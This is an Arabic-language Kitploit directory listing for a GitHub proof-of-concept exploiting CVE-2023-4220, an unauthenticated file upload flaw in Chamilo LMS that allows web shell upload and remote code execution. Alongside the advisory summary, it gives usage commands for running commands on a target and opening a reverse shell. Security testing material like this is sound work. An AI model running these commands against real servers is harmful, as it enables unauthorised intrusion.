Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-4226-POC — POC لـ CVE-2023-4220 - تنفيذ كود عن بُعد عبر تحميل ملف كبير غير موثق في Chamilo LMS | Kitploit
أدوات/GitHubGitHub/krishnan-tech/cve-2023-4226-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubkrishnan-tech/cve-2023-4226-poc

CVE-2023-4226-POC

POC لـ CVE-2023-4220 - تنفيذ كود عن بُعد عبر تحميل ملف كبير غير موثق في Chamilo LMS

عرض المستودع
111منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-4220 POC

المزيد عن CVE-2023-4220: استشارة StarLabs

ملخص

المنتجChamilo
البائعChamilo
الخطورةعالي - قد يستغل الخصوم ثغرات برمجية للحصول على تنفيذ كود عن بعد غير مصادق عليه.
الإصدارات المتأثرة<= v1.11.24
الإصدارات المختبرةv1.11.24 (أحدث إصدار وقت الكتابة)
معرف CVECVE-2023-4220
وصف CVEرفع ملف غير مقيد في وظيفة رفع الملفات الكبيرة في /main/inc/lib/javascript/bigupload/inc/bigUpload.php في Chamilo LMS <= v1.11.24 يسمح للمهاجمين غير المصادقين بتنفيذ هجمات تخزينية عبر المواقع (XSS) والحصول على تنفيذ كود عن بعد عبر رفع شل ويب.
تصنيف CWECWE-434: رفع غير مقيد لملف بنوع خطير
تصنيف CAPECCAPEC-650: رفع شل ويب لخادم ويب

إثبات المفهوم (PoC)

تنفيذ الأوامر مباشرة

لتنفيذ الأوامر مباشرة، استخدم الأمر التالي:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -c whoami

الحصول على شل عكسي

للحصول على شل عكسي، استخدم الأمر التالي:

python CVE-2023-4226.py -u http://<target_ip>:<target_port> -lhost <local_ip> -lport <local_port>

تنزيل الأداة